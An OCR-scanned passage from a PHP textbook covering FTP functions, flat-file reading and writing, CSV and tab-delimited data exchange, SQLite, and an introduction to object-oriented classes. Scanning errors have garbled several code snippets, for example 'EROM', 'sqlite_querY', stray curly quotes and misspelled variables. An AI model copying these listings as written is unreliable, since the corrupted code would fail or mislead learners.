name already exists on the local computer. If a file with that name doesn’t 
already exist, the file is downloaded; if such a file does exist, a message is 
printed, and the file isn’t downloaded. 

The script in Listing 3-2 Includes a file named f tpstuf f. inc. This file 
contains the information needed to connect to the server with FTP. The 
f tpstuf f. inc file contains code similar to the following: 

<?php 

$servername = "yourserver" ; 

$userID = "youruserid" ; 

$passwd = "yourpassword"; 

?> 

Looking at other FTP functions 

Additional FTP functions perform other actions, such as change to another 
directory on the remote computer or create a new directory on the remote 
computer. Table 3-2 contains most of the FTP functions that are available. 


Table 3-2 

FTP Functions 

Function 

IVhat It Does 

ftp_cdup ( $connect) 

Changes to the directory directly 
above the current directory. 

ftp_chdir($connect, 

" directoryname") 

Changes directories on the remote 
computer. 

ftp close($connect) 

Closes an FTP connection. 

ftp_connect ( " servername") 

Opens a connection to the computer. 
servername can be a domain name 
or an IP address. 

ftp_delete ( $connect, "path/ 
filename" ) 

Deletes a file on the remote 
computer. 

ftp_exec 

( $connect," command") 

Executes a system command on the 
remote computer. 

f tp_ 

fget($connect,$fh,"data, 
txt",FTP_ASCII) 

Downloads the file contents from the 
remote computer into an open file. 

$ f h is the file handle of the open file. 
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Function 

IVfiat It Does 

ftp_fput($connect,"new. 
txt",$fh,FTP_ASCII) 

Uploads an open file to the remote 
computer. $fhisthefile handle of the 
open file. 

ftp_get($connect,"d. 
txt","sr.txt",FTP_ASCII) 

Downloads a file from the remote 
computer, sr. txt is the name of the 
file to be downloaded, and d. txt is 
the name of the downloaded file. 

ftp_login($connect,$userID 
,$password) 

Logs in to the FTP server. 

f tp_mdtin ( $connect, 

"fi1ename.txt") 

Gets the time when the file was last 
modified. 

ftp_mkdir($connect, 

" directoryname") 

Creates a new directory on the remote 
computer. 

ftp_nlist($connect, 

" directoryname") 

Gets a list of the files in a remote 
directory. Files are returned in an 
array. 

ftp_put($connect,"d. 
txt","sr.txt",FTP_ASCII) 

Uploads a file to the remote computer, 
sr.txt is the name ofthefileto be 
uploaded, and d. txt is the filename 
on the remote computer. 

ftp_pwd($connect) 

Gets the name of the current directory 
on the remote computer. 

ftp_rename($connect, " oldna 
me" , "newname") 

Renames a file on the remote computer. 

ftp_rmdir($connect, 

" directoryname") 

Deletes a directory on the remote 
computer. 

ftp_ 

size($connect, "filename . 
txt") 

Returns the size of the file on the 
remote computer. 

ftp_SYStYpe($connect) 

Returns the system type of the remote 
file server (for example, Unix). 
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Reading and Writing Fites 

This book includes information about using PHP and MySQL together. In 
most applications, you store the data needed by the application in a MySQL 
database. However, occasionally you need to read or write information in a 
text file that isn’t a database. This section describes how to read and write 
data in a text file, also called a flat file. 
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You use PHP statements to read from or write to a flat file. 

Using a flat file requires three steps: 

1 . Open the file. 

2 . Write data into the file or retrieve data from the file. 

3. Close the file. 

These steps are discussed in detail in the following sections. 

Accessing files 

The first step, before you can write information into or read information 
from a file, is to open the file. The following is the general format for the 
statement that opens a file: 

$fh = fopen("filename","mode") 

The variable, $ f h, referred to as a file handle, is used in the statements that 
write data to or read data from the open file so that PHP knows which file to 
write into or read from. The $ f h variable contains the Information that iden¬ 
tifies the location of the open file. 

You use a mode when you open the file to let PHP know what you intend to 
do with the file. Table 3-3 shows the modes you can use. 


Table 3-3 Modes for Opening a File 

Mode 

What It Does 

What Happens When the Fite Doesn't 

Exist 

r 

Read only. 

A warning message is displayed. 

r+ 

Reading and writing. 

A warning message is displayed. 

w 

Write only. 

PHP attempts to create it. (If the file exists, 
PHP overwrites it) 

w+ 

Reading and writing. 

PHP attempts to create it (If the file exists, 
PHP overwrites it) 

a 

Append data at the end 
of the file. 

PHP attempts to create it 

a+ 

Reading and appending. 

PHP attempts to create it 


The filename can be a simple filename (filename. txt), a path to the 
file (c; /data/filename. txt), or a URL (http: //yoursi te. com/ 
filename. txt). 
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Opening files in read mode 

You can open the file f ilel. txt to read the information in the file with the 
following statement: 

$fh = fopen("filel.txt”,"r"); 

Based on this statement, PHP looks for filel. txt in the current directory, 
which is the directory where your PHP script is located. If the file can’t be 
found, a warning message, similar to the following, might or might not be 
displayed, depending on the error level set, as described in Chapter 1 of this 
minibook: 

Warning: fopen ( filel.txt ) : failed to open stream: No such 
file or directory in d:\test2.php on line 15 

Remember, a warning condition doesn’t stop the script. The script continues 
to run, but the file doesn’t open, so any later statements that read or write to 
the file aren’t executed. 

You probably want the script to stop if the file can’t be opened. You need to 
do this yourself with a die statement, as follows: 

$fh = fopen("filel.txt","r") 

or die("Can't open file"); 

The die statement stops the script and displays the specified message. 


Opening files in iPrite mode 

You can open a file in a specified directory to store information by using the 
following type of statement: 

$fh = fopen("c:/testdir/filel.txt","w"); 


If the file doesn’t exist, it is created in the indicated directory. However, if 
the directory doesn’t exist, the directory isn’t created, and a warning is dis¬ 
played. (You must create the directory before you try to write a file into the 
directory.) 
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You can check whether a directory exists before you try to write a file into it 
by using the following statements: 


If(is_dir("c:/tester")) 

{ 

$fh = fopen("c:/testdir/filel.txt","w"); 

} 


With these statements, the fopen statement is executed only if the path/ 
filename exists and is a directory. 
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Opening files on another tPehsite 

You can also open a file on another website by using a statement such as the 
following: 

$fh = fopen("http://janet.valade.com/index.htmlr"); 

You can use a URL only with a read mode, not with a write mode, and there 
are better ways to do this — namely, the cURL functions. See the PHP 
manual at http: / /php. net/manual/en/book. curl .php for more infor¬ 
mation on the cURL functions. 

Closing a fife 

To close a file after you have finished reading or writing it, use the following 
statement: 

fclose($fh); 

In this statement, $fh is the file handle variable you created when you 
opened the file. 

Writinq^ to a fite 

After you open the file, you can write into it by using the fwrite statement, 
which has the following general format: 

fwrite($fh,datatosave) ; 

In this statement, $fh is the file handle that you created when you opened 
the file containing the pointer to the open file, and datatosave is the infor¬ 
mation to be stored in the file. The information can be a string or a variable. 
For example, you can use the following statements: 

$todaY = date("Y-m-d”); 

$fh = fopen("file2.txt","a"); 
fwrite ($fh, " $todaY\n'') ; 
fclose($fh); 

These statements store the current date in a file called f ile2 . txt. Notice 
that the file is opened in append mode (a). If the file doesn’t exist, it is cre¬ 
ated, and the date is written as the first line. If the file exists, the date is 
added to the end of the file. In this way, you create a log file that stores a list 
of the dates on which the script is run. The fwrite statement stores exactly 
what you send. After the fwrite statement executes twice, f ile2 . txt 
contains: 

2013-10-22 

2013-10-22 
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The dates appear on separate lines because the new line character (\n) is 
written to the file. 

Be sure to open the file with the a mode if you want to add information to a 
file. If you use a write mode, the file is overwritten each time it’s opened. 

Reading from a file 

You can read from a file by using the f gets statement, which has the following 
general format: 

$line = fgets($fh) 

In this statement, $ f h holds the pointer to the open file. This statement reads 
a string until it encounters the end of the line or the end of the file, whichever 
comes first, and stores the string in $line. To read an entire file, you keep 
reading lines until you get to the end of the file. PHP recognizes the end of the 
file and provides a function f eof to tell you when you reach the end of the 
file. The following statements read and display all the lines in the file: 

while(!feof($fh)) 

{ 

$line = fgets($fh); 
echo "$line"; 

} 

In the first line, feof ($fh) returns true when the end of the file is reached. 

The exclamation point negates the condition being tested, so that the while 
statement continues to run as long as the end of the file isn’t reached. When 
the end of the file is reached, while stops. 

If you use these statements to read the log file created in the preceding 
section, you get the following output: 
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2013-10-22 

2013-10-22 

As you can see, the new line character is included when the line is read. 
In some cases, you don’t want the end of line included. If so, you need to 
remove it by using the following statements: 

while(!feof($fh)) 

{ 

$line = rtrim(fgets($fh)); 
echo "$line"; 

} 
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The rtrim function removes any trailing blank spaces and the new line 
character. The output from these statements is as follows: 

2013-10-222013-10-22 

Reading files piece bg piece 

Sometimes you want to read strings of a certain size from a file. You can tell 
f gets to read a certain number of characters by using the following format: 

$line = fgets($fh,n) 

This statement tells PHP to read a string that is n-1 characters long until it 
reaches the end of the line or the end of the file. 

For example, you can use the following statements: 

while(!feof($fh)) 

{ 

$char4 = fgets($fh,5); 
echo ”$char4\n"; 

} 

These statements read each four-character string until the end of the file. 
The output is as follows: 

2013 

- 10 - 

22 

2013 

- 10 - 

22 

Notice that there’s a new line at the end of each line of the file. 

Reading a file into an arrag 

It’s often handy to have the entire file in an array. You can do that with the 
following statements: 

$fh = fopen(”file2.txt","r"); 
while(!feof($fh)) 

{ 

$content[] = fgets($fh); 

} 

fclose($fh); 

The result is the array $ content with each line of the file as an element of 
the array. The array keys are numbers. 
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PHP provides a shortcut function for opening a file and reading the entire 
contents into an array, one line in each element of the array. The following 
statement produces the same results as the preceding five lines: 

$content = file("file2.txt"); 


The statement opens f ile2 . txt, puts each line into an element of the array 
$content, and then closes the file. 



The file function can slow down your script if the file you’re opening 
is really large. How large depends on the amount of available computer 
memory. If your script seems slow, try reading the file with fgets rather 
than file and see whether that speeds up the script. 


You can direct the file function to automatically open files in your 
include directory (described in Chapter 2 of this minibook) by using the 
following statement: 


$content = file("file2.txt",1); 


The 1 tells PHP to look for f ile2 . txt in the include directory rather than 
in the current directory. 


Reading a file into a string 

Sometimes putting the entire contents of a file into one long string can be 
useful. For example, you might want to send the file contents in an e-mail 
message. PHP provides a function for reading a file into a string, as follows: 

$content = file_get_contents("file2.txt",1); 


The file_get_contents function works the same as the file function, 
except that it puts the entire contents of the file into a string rather than an 
array. After this statement, you can echo $content as follows: 

echo $content; 

The output is the following: 
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2013-10-22 

2013-10-22 



The output appears on separate lines because the end-of-line characters are 
read and stored as part of the string. Thus, when you echo the string, you 
also echo the end-of-line characters, which start a new line. 

The f ile_get_contents function was introduced in version 4.3.0. It isn’t 
available in older versions of PHP. 
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EKchan0in0 Data u/ith Other Programs 

You might sometimes need to provide information to other programs or 
read information into PHP from other programs. Flat files are particularly 
useful for such a task, and we explain how to perform that kind of task here. 

Exchanging data in flat files 

Almost all software has the capability to read information from flat files or 
write information into flat files. For example, by default, your word processor 
saves your documents in its own format, which only the word processor can 
understand. However, you can choose to save the document in text format 
instead. The text document is a flat file containing text that can be read by 
other software. Your word processor can also read text files, even ones that 
were written by other software. 

When your PHP script saves information into a text file, the information can 
be read by any software that has the capability to read text files. For example, 
text files can be read by most word processing software. However, some 
software requires a specific format in the text file. For example, an address 
book software application might read data from a flat file but require the 
information to be in specified locations — for example, the first 20 characters 
in a line are read as the name, the next 20 characters are read as the street 
address, and so on. You need to know what format the software requires in 
a flat file. Then write the flat file in the correct format in your PHP script by 
using fwrite statements, as discussed in the section “Writing to a file,” 
earlier in this chapter. 

Exchanging data in comma-delimited format 

A comma-separated values (CSV) file — also called a comma-delimited file — 
is a common format used to transfer information between software programs. 

Understanding comma-delimited format 

A CSV file is used to transfer information that can be structured as a table, 
organized as rows and columns. For example, spreadsheet programs orga¬ 
nize data as rows and columns and can read and write CSV files. A CSV file is 
also often used to transfer data between different database software, such as 
between MySQL and Microsoft Access. Many other software programs can 
read and write data in CSV files. 

A CSV file is organized with each row of the table on a separate line in the 
file, and the columns in the row are separated by commas. For example, an 
address book can be organized as a CSV file, as follows: 

John Smith,1234 Oak St.,Big City,OR,99999 
Mary Jones,5678 Pine St.,Bigger City,ME,11111 
Luis Rojas,1234 Elm St.,Biggest City,TX,88888 
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Excel can read this file into a table with five columns. The comma signals the 
end of one column and the start of the next. 

Creating a comma-detimited file 

The following PHP statements create the CSV file: 

$address[] = "John Smith,1234 Oak St.,Big City,OR,99999"; 
$address[] = "Mary Jones,5678 Pine St.,Bigger City,ME,11111"; 
$address[] = "Luis Rojas,1234 Elm St.,Biggest City,TX,88888"; 
$fh = fopen("addressbook.txt","a"); 
for ($i=0;$i<3;$i++) 

{ 

fwrite($fh,$address[$i]."\n"); 

} 

fclose($fh); 


Reading a comma-detimited file 

PHP can read the CSV file by using either the file or the fgets function, as 
described in the section “Reading a file into an array,” earlier in this chapter. 
However, PHP provides a function called f getcsv that’s designed specifically 
to read CSV files. When you use this function to read a line in a CSV file, the 
line is stored in an array, with each column entry in an element of the array. 
For example, you can use the function to read the first line of the address 
book CSV file, as shown here: 

$address = fgetcsv($fh,1000); 


In this statement, $fh is the file handle, and 1000 is the number of characters 
to read. To read an entire line, use a number of characters that is longer 
than the longest line. The result of this statement is an array, as follows: 


$address[0] 
$address[1] 
$address[2] 
$address[3] 
$address[4] 


John Smith 
1234 Oak St 
Big City 
OR 

99999 
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The CSV file works well for transferring data in many cases. However, if a 
comma is part of the data, commas can’t be used to separate the columns. 
For example, suppose one of the data lines is this: 

Smith Company, Inc.,1234 Fir St.,Big City,OR,99999 

The comma in the company name would divide the data into two columns — 
Smith Company in the first and inc . in the second — making six columns 
Instead of five. 
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When the data contains commas, you can use a different character to sepa¬ 
rate the columns. For example, tabs are commonly used to separate col¬ 
umns. This file is called a tab-separated values (TSV) file, or a tab-delimited 
file. You can write a tab-delimited file by storing " \ t" rather than a comma 
in the output file. 

You can read a file containing tabs by specifying the column separator in the 
statement, as follows: 

$address = fgetcsv($fh,1000,”\t"); 

You can use any character to separate columns. 

The script in Listing 3-3 contains a function that converts any CSV file into a 
tab-delimited file. 


Listing 3-3: A Script That Converts a CSV File into a Tab-Delimited File 

<?php 

/* * Script name: Convert 

* Description: Reads in a CSV file and outputs a 

* tab-delimited file. The CSV file must have a 

* .CSV extension. 

*/ 


$myfile = "testing”; — >7 

function convert($filename) — >8 

{ 

if( @$fh_in = fopen(”{$filename}. CSV", "r")) — >10 

{ 

$fh_out = fopen("{$filename}.tsv","a") ; — >12 

while( !feof($fh_in)) — >13 

{ 

$line = fgetcsv($fh_in,1024); — >15 

if( $line[0] == "") ->16 

{ 

fwrite($fh_out,"\n") ; 

} 

else { — >20 

fwrite($fh_out,implode($line,"\t") ."\n"); — >21 


} 

} 

fclose($fh_in); 
fclose($fh_out); 

} 

else { ->27 

echo "File doesn't existin''; 
return false; 

} 
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echo "Conversion completed!\n"; 

return true; — >32 

} 

convert($myflie); — >34 


The following points refer to the line numbers in the Listing 3-3: 


->7 

->8 

->10 


->12 


->13 

->15 

->16 


->20 

->21 


->27 

->32 

->34 


This line defines the filename as testing. 

This line defines a function named convert () with one parameter, 

$filename. 

This line opens a file that has the filename that was passed to the 
function with a . csv extension. The file is opened in read mode. 

If the file is opened successfully, the conversion statements in the 
if block are executed. If the file isn’t found, the else block 
beginning on Line 27 is executed. 

This line opens a file that has the filename that was passed to 
the function with a . tsv extension. The file is opened in append 
mode. The file is in the current directory in this script. If the file is 
in another directory where you think there is any possibility the 
file might not open in write mode, use an if statement here to 
test where the file opened and perform some action if it did not. 

This line starts a while loop that continues to the end of the file. 

This statement reads one line from the input file into the array 
$line. Each column entry is stored in an element of the array. 

This statement tests whether the line from the input file has any 
text on it. If the line doesn’t have any text, a new line character is 
stored in the output file. Thus, any empty lines in the input file are 
stored in the output file. 

If the line from the input file isn’t empty, it’s converted to a tab- 
delimited format and written into the output file. 

This statement converts the line and writes it to the output file in 
one statement. The implode function converts the array $line 
into a string, with the elements separated by a tab. 

This else block executes when the input file can’t be found. An 
error message is echoed, and the function returns false. 

The function has completed successfully, so it returns true. 

This line calls the function, passing a filename to the function in 
the variable $mYfile. 
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Using SQLite 

Beginning with PHP 5.0, PHP includes the SQLite software by default. SQLite 
is designed to store data in a flat file using SQL queries. (SQL is explained in 
Book V, Chapter 1.) 

SQLite is a quick, easy way to store data in a flat file. However, it’s less 
secure than a database and can’t handle complex data. In most cases, you 
should store your data in MySQL, but you occasionally might want to store 
your data in a flat file. For example, you might want to write the data in a 
format that can be read by another program, such as Excel. 

Storing and retrieving data with SQLite is similar to the methods described 
in Book V for using MySQL with PHP. You use SQL to communicate with the 
data file and use PHP functions to send the SQL and retrieve the data. You 
interact with the data by using the same steps that you use with a database, 
as follows: 

1 . Connect to the data file. 

2. Send an SQL query. 

3. If you retrieved data from the data file, process the data. 

4. Close the connection to the data file. 

Here are more details on how to complete each of those steps. 

To connect to the data file, use the following PHP function: 

$db = sqlite_open("testdb"); 

This statement opens the data file testdb. If the file doesn’t exist, the func¬ 
tion creates it. 

To send an SQL query, use the sqlite_query function, as follows: 

$sql = "SELECT * EROM Product"; 

$result = sqlite_querY($db,$sql); 

The retrieved data is stored in a temporary table in rows and columns. You 
can use PHP functions to retrieve one row from the temporary data table 
and store it in an array, with the field names as the array keys. The state¬ 
ment is as follows: 

$row = sqlite_fetch_array($result); 
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After this statement, $row is an array containing all the fields in the tempo¬ 
rary table, such as the following: 

$row['firstName'] = John 
$row['lastName'] = Smith 

To process all the data in the temporary table, you can use a loop to get one 
row at a time, processing each row until the end of the table is reached, as 
follows: 

while($row=sqlite_fetch_asoc($result)) 

{ 

foreach($row as $value) 

{ 

echo "$value<br />"; 

} 

} 

When you finish storing and/or retrieving data, you can close the data file 
with the following statement: 

sqlite_close($db); 

Error handling for SQLite is similar to MySQL error handling, as explained in 
Book V, Chapter 5. Also, as discussed in that chapter, when the query fails, 
an SQLite error message is generated, but not displayed unless you use a 
function developed specifically to display it. Thus, the following statements 
handle errors in addition to sending the SQL query: 


$sql = "SELECT * FROM Product"; 

$result = sqlite_querY($sql) 

or die("Query failed: ".sqlite_error()); 

$row = sqlite_fetch_array($result); 

Most of the information in Book V about MySQL applies to the use of SQLite 
as well. What makes SQLite different is that the data is stored in a flat file, 
rather than stored by MySQL in files that are unique to MySQL. 
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In This Chapter 

Understanding object-oriented programming 
u* Planning an object-oriented script 
Defining and writing classes 
Dealing with errors by nsing exceptions 
u* Copying, comparing, and destroying objects 


m mbject-oriented programming (OOP) is an approach to programming that 
uses objects and classes. It’s in widespread use today, with many uni¬ 
versities teaching object-oriented programming in beginning programming 
classes. Currently, Java and C++ are prevalent languages used for object- 
oriented programming. 


Object-oriented programming, with a limited feature set, is possible in PHP 4. 
With PHP 5, the object-oriented capabilities of PHP were greatly improved, with 
both more speed and added features. The information and sample scripts in 
this chapter are written for PHP 5. Features that aren’t available in PHP 4 are 
noted. 


This chapter introduces object-oriented programming with a specific focus 
on how to use OOP concepts as they apply to PHP. 


Introducing Object-Oriented Programming 

Object-oriented programming, sometimes shortened to OOP, isn’t just a 
matter of using different syntax. It’s a different way of analyzing program¬ 
ming problems. The application is designed by modeling the programming 
problem. For example, a programmer designing an application to support 
a company’s sales department might look at the programming project in 
terms of the relationships between customers and sales and credit lines — 
in other words, in terms of the design of the sales department itself. 

In object-oriented programming, the elements of a script are objects. The 
objects represent the elements of the problem your script is meant to solve. 
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For example, if the script is related to a used-car lot, the objects are probably 
cars and customers. Or if the script is related to outer space, the objects 
would probably be stars and planets. 

Object-oriented programming developed new concepts and new terminology 
to represent those concepts. Understanding the terminology is the road to 
understanding object-oriented programming, and we explain that terminology 
to you here. 

Objects and classes 

The basic elements of object-oriented programs are objects. It’s easiest to 
understand objects as physical objects. For example, a car is an object. A car 
has properties (also called attributes^, such as color, model, engine, and tires. 
A car has things it can do, too, such as move forward, move backward, park, 
roll over, and play dead (well, ours does anyway). 

In general, objects are nouns. A person is an object. So are animals, houses, 
offices, garbage cans, coats, clouds, planets, and buttons. However, objects 
are not just physical objects. Like nouns, objects often are more conceptual. 
For example, a bank account isn’t something you can hold in your hand, but 
it can be considered an object. So can a computer account or a mortgage. A 
file is often an object. So is a database. E-mail messages, addresses, songs, 

TV shows, meetings, and dates can all be objects. Objects in web applica¬ 
tions might be catalogs, catalog items, shopping carts, customers, orders, or 
customer lists. 

A class is the PHP code that serves as the template, or the pattern, that is 
used to create an object. The class defines the properties, the attributes, of 
the object. It also defines the things the object can do — its responsibilities. 
For example, you write a class that defines a car as four wheels and an engine, 
and the class lists the things a car can do, such as move forward and park. 
Then, given that class, you can write a statement similar to the following 
that creates a car object: 

$myCar = new Car(); 

The object $mYCar is created from the definition in the class Car. Your 
new car has four wheels and an engine and can move forward and park, as 
defined in the class Car. When you use your car object $myCar, you might 
find that it’s missing a few important things, such as a door, or a steering 
wheel, or a reverse gear. That’s because you left an important item out of 
the class Car when you wrote it. 

From a more technical point of view, an object is a complex, user-defined data 
type. The process of creating an object from a class is called instantiation. An 
object is an instance of a class. For instance, $myCar is an instance of the 
class Car. 
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As the person who writes a class, you know how things work inside the 
class. However, the person who uses an object created from the class 
doesn’t need to know how an object accomplishes its responsibilities. Most 
people have no clue how a telephone object works, but they can use it to 
make a phone call. The person who built the telephone knows what’s hap¬ 
pening Inside it. When there’s new technology, the phone builder can open 
a phone and improve it. As long as he doesn’t change the interface — the 
keypad and buttons — it doesn’t affect the use of the phone at all. 

Properties 

Objects have properties, also sometimes called attributes. A car may be red, 
green, or covered in polka dots — a color property. Properties — such as 
color, size, or model for a car — are stored inside the object. Properties are 
set up in the class as variables. For example, the color attribute is stored in 
the object in a variable, given a descriptive name such as $color. Thus, the 
car object $myCar might contain $color = red. 

The variables that store properties can have default values, can be given 
values when the object is created, or values can be added or modified later. 
For example, a $mYCar object is created red, but when it’s painted later, the 
$color property is changed to chartreuse. 

Metfioits 

The things objects can do are sometimes referred to as responsibilities. For 
example, a Car object can move forward, stop, back up, and park. Each thing 
an object can do — each responsibility — is programmed into the class and 
called a method. 

In PHP, methods use the same syntax as functions. Although the code looks 
like the code for a function, the distinction is that methods are inside a class. 
It can’t be called independently of an object. PHP won’t allow it. This type of 
function can perform its task only when called with an object. 

When creating methods, give them names that are descriptive of what they 
do. For instance, a customerOrder class might have methods such as 
displayOrder, getTotalCost, computeSalesTax, and cancelOrder. 
Methods, like other PHP entities, can be named with any valid name, but 
they’re often named with camel caps, by convention, as shown here. 

The methods are the interface between the object and the rest of the world. 
The object needs methods for all its responsibilities. Objects should Interact 
with the outside world only through their methods. For example, suppose 
your object is a catalogitem that is for sale. One of its properties is $price. 
You don’t want $price to be easily changed by a simple statement, such as 
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Instead, you want a method, called changePrice, that is the only way the 
price can be edited. The method includes checks to be sure that only legiti¬ 
mate users can use it to change the price. 

A good object should contain all it needs to perform its responsibilities, but 
not a lot of extraneous data. It shouldn’t perform actions that are another 
object’s responsibility. The car object should travel and should have every¬ 
thing it needs to perform its responsibilities, such as gas, oil, tires, engine, 
and so on. The car object shouldn’t cook and doesn’t need to have salt or 
frying pans. Nor should the cook object carry the kids to soccer practice. 


Inheritance 

Objects should contain only the properties and methods they need. No 
more. No less. One way to accomplish that is to share properties and meth¬ 
ods between classes by using inheritance. For example, suppose you have 
two rose objects: one with white roses and one with red roses. You could 
write two classes: a redRose class and a whiteRose class. However, a lot 
of the information is the same for both objects. Both are bushes, both are 
thorny, and both bloom in June. Inheritance enables you to eliminate the 
duplication. 

You can write one class called Rose. You can store the common information 
in this class, such as $plant = bush, $ stem = thorns, and $blooms = 
June. Then you can write subclasses for the two rose types. The Rose class 
is called the master class or the parent class. redRose and whiteRose are 
the subclasses, which are referred to as child classes (or the kids, as a favor¬ 
ite professor fondly referred to them). 

Child classes inherit all the properties and methods from the parent class. 
But they can also have their own individual properties, such as $color = 
white for the whiteRose class and $color = red for the redRose class. 



A child class can contain a method with the same name as a method in a 
parent class. In that case, the method in the child class takes precedence 
for a child object. You can specify the method in the parent class for a child 
object if you want, but if you don’t, the child class method is used. 

Some languages allow a child class to inherit from more than one parent 
class, called multiple inheritance. PHP doesn’t allow multiple inheritance. 

A class can inherit from only one parent class. 


De(/elopin0 an Object-Oriented Script 

Object-oriented scripts require a lot of planning. You need to plan your objects 
and their properties and what they can do. Your objects need to cover all 
their responsibilities without encroaching on the responsibilities of other 
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objects. For complicated projects, you might have to do some model building 
and testing before you can feel reasonably confident that your project plan 
includes all the objects it needs. 

Developing object-oriented scripts includes the following procedures, which 
the next sections cover in more detail: 

1 . Choose the objects. 

2. Choose the properties and methods for each object. 

3 . Create the object and put it to work. 

Choosing objects 

Your first task is to develop the list of objects needed for your programming 
project. If you’re working alone and your project is small, the objects might 
be obvious. However, if you’re working on a large, complex project, selecting 
the list of objects can be more difficult. For example, if your project is devel¬ 
oping the software that manages all the tasks in a bank, your list of possible 
objects is large: account, teller, money, checkbook, wastebasket, guard, 
vault, alarm system, customer, loan, interest, and so on. But, do you need 
all those objects? What is your script going to do with the wastebasket in 
the front lobby? Or the guard? Well, perhaps your script needs to schedule 
shifts for the guards. 

When you’re planning object-oriented programs, the best strategy for iden¬ 
tifying your objects is to list all the objects you can think of — that is, all the 
nouns that might have anything at all to do with your project. Sometimes 
programmers can take all the nouns out of the project proposal documenta¬ 
tion to develop a pretty comprehensive list of possible objects. 

After you create a long list of possible objects, your next task is to cross off 
as many as possible. You should eliminate any duplicates, objects that have 
overlapping responsibilities, and objects that are unrelated to your project. 
For example, if your project relates to building a car, your car project prob¬ 
ably needs to have objects for every part in the car. On the other hand, if 
your project involves traffic control in a parking garage, you probably need 
only a car object that you can move around; the car’s parts don’t matter for 
this project. 

Setectin^ properties and methods for each object 

When you have a comprehensive list of objects, you can begin to develop 
the list of properties for each object. Ask yourself wbat you need to know 
about each object. For example, for a car repair project, you probably need 
to know things like when the car was last serviced, its repair history, any 
accidents, details about the parts, and so on. For a project involving parking 
garage traffic, you probably need to know only the car’s size. How much 
room does the car take up in the parking garage? 
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You need to define the responsibilities of each object, and each object needs 
to be independent, ft needs methods for actions that handle all of its respon¬ 
sibilities. For example, if one of your objects is a bank account, you need to 
know what a bank account needs to do. Well, first, it needs to be created, 
so you can define an openNewAccount method, ft needs to accept deposits 
and disburse withdrawals. It needs to keep track of the balance. It needs to 
report the balance when asked. It might need to add interest to the account 
periodically. Such activities come to mind quickly. 

However, a little more thought, or perhaps testing, can reveal activities that 
you overlooked. For example, the account stores information about its owner, 
such as name and address. Did you remember to include a method to update 
that Information when the customer moves? It might seem trivial compared to 
moving the money around, but it won’t seem trivial if you can’t do it. 

Creating and usin^ an object 

After you decide on the design of an object, you can create and then use the 
object. The steps for creating and using an object are as follows: 

1. Write the class statement. 

The class statement is a PHP statement that is the blueprint for the 
object. The class statement has a statement block that contains PHP 
code for all the properties and methods that the object has. 

2. Include the class in the script where you want to use the object. 

You can write the class statement in the script itself. However, it’s 
more common to save the class statement in a separate file and use an 
include Statement to include the class at the beginning of the script 
that needs to use the object. 

3. Create an object in the script. 

You use a PHP statement to create an object based on the class. This is 
called instantiation. 

It. Use the new object. 

After you create a new object, you can use it to perform actions. You can 
use any method that is inside the class statement block. 

The rest of this chapter provides the details needed to complete these steps. 


Defining a Class 

After you’ve determined the objects, properties, and methods your project 
requires, you’re ready to define classes. The class is the template (pattern) 
for the object. 
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Writing a class statement 

You write the class statement to define the properties and methods for the 
class. The class statement has the following general format: 

class className 
{ 


Add statements that define the properties 
Add all the methods 

} 

You can use any valid PHP identifier for the class name, except the name 
stdClass. PHP uses the name stdClass internally, so you can’t use this 
name. 

All the property settings and method definitions are enclosed in the opening 
and closing curly braces. If you want a class to be a subclass that inherits 
properties and methods, use a statement similar to the following: 

class whiteRose extends Rose 
{ 

Add the property statements 
Add the methods 

} 

The object created from this class has access to all the properties and meth¬ 
ods of both the whiteRose child class and the Rose class. The Rose class, 
however, doesn’t have access to properties or methods in the child class, 
whiteRose. Imagine, the child owns everything the parent owns, but the 
parent owns nothing of the child’s. What an idea. 

The next few sections show you how to set properties and define methods 
within the class statement. For a more comprehensive example of a com¬ 
plete class statement, see the section, “Putting it all together,” later in this 
chapter. 

Setting properties 

When you’re defining a class, you declare all the properties at the top of the 
class, as follows: 

class Car 
{ 

private $color; 
private $tires; 
private $gas; 

Method statements 

} 


Book IV 
Chapter 4 


Object-Oriented 

Programming 




m Defining a Class 



PHP doesn’t require you to declare variables. In the other PHP scripts dis¬ 
cussed in this book, variables aren’t declared; they’re just used. You can do 
the same thing in a class. However, it’s much better to declare the proper¬ 
ties in a class. By including declarations, classes are much easier to under¬ 
stand. It’s poor programming practice to leave this out. 


Each property declaration begins with a keyword that specifies how the 
property can be accessed. The three keywords are 



♦ public: The property can be accessed from outside the class, either by 
the script or from another class. 

♦ private: No access is granted from outside the class, either by the 
script or from another class. 

♦ protected: No access is granted from outside the class except from a 
class that’s a child of the class with the protected property or method. 

Classes should be written so that methods are used to access properties. By 
declaring a property to be private, you make sure that the property can’t be 
accessed directly from the script. 

If you want to set default values for the properties, you can, but the values 
allowed are restricted. You can declare a simple value, but not a computed 
one, as detailed in the following examples: 


-f The following variable declarations are allowed as default values: 

private $color = "black"; 
private $gas = 10; 
private $tires = 4; 

♦ The following variable declarations are not allowed as default values: 

private $color = "blue"." black"; 
private $gas = 10 - 3; 
private $tires =2*2; 


An array is allowed in the variable declaration, as long as the values are 
simple, as follows: 

private $doors = array("front","back"); 


To set or change a variable’s value when you create an object, use the con¬ 
structor (described in the “Writing the constructor” section, later in this 
chapter) or a method you write for this purpose. 


Accessing properties usin^ $tfiis 

Inside a class, $this is a special variable that refers to the properties of the 
same class. $this can’t be used outside of a class. It’s designed to be used 
in statements inside a class to access variables inside the same class. 
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The format for using $this is the following: 

$this->varr!ame 

For example, in a CustomerOrder class that has a property $totalCost, 
you would access $totalCost in the following way: 

$this->totalCost 

Using $this refers to $totalCost inside the class. You can use $this as 
shown in any of the following statements: 

$this->totalCost = 200.25; 
if($this->totalCost > 1000) 

$product[$this->size] = $price 

As you can see, you use $this->varnaii!e in all the same ways you would 
use $varnaine. 

Notice that a dollar sign ($) appears before this hut not before gas. Don’t 
use a dollar sign before totalCost — as in $this->$totalCost — 
because it changes your statement’s meaning. You might or might not get an 
error message, but it isn’t referring to the variable $ totalCost inside the 
current class. 

Adding methods 

Methods define what an object can do and are written in the class in the same 
format you’d use to write a function. For example, your CustomerOrder 
might need a method that adds an item onto the total cost of the order. You 
can have a variable called total that contains the current total cost. You can 
write a method that adds the price of an item to the total cost. You could add 
such a method to your class, as follows: 
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class CustomerOrder 
{ 

private $total = 0; 
function additem($amount) 

{ 

$this->total = $this->total + $amount; 

echo "$amount was added; current total is $this->total"; 

} 


This looks just like any other function, but it’s a method because it’s inside 
a class. You can find details about writing functions in Chapter 2 in this 
minibook. 
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Like functions, methods accept values passed to them. The values passed 
need to be the correct data type to be used in the function. (See Chapter 1 in 
this minibook for a discussion of data types.) For instance, in the preceding 
example, $ainount needs to be a number. Your method should include a 
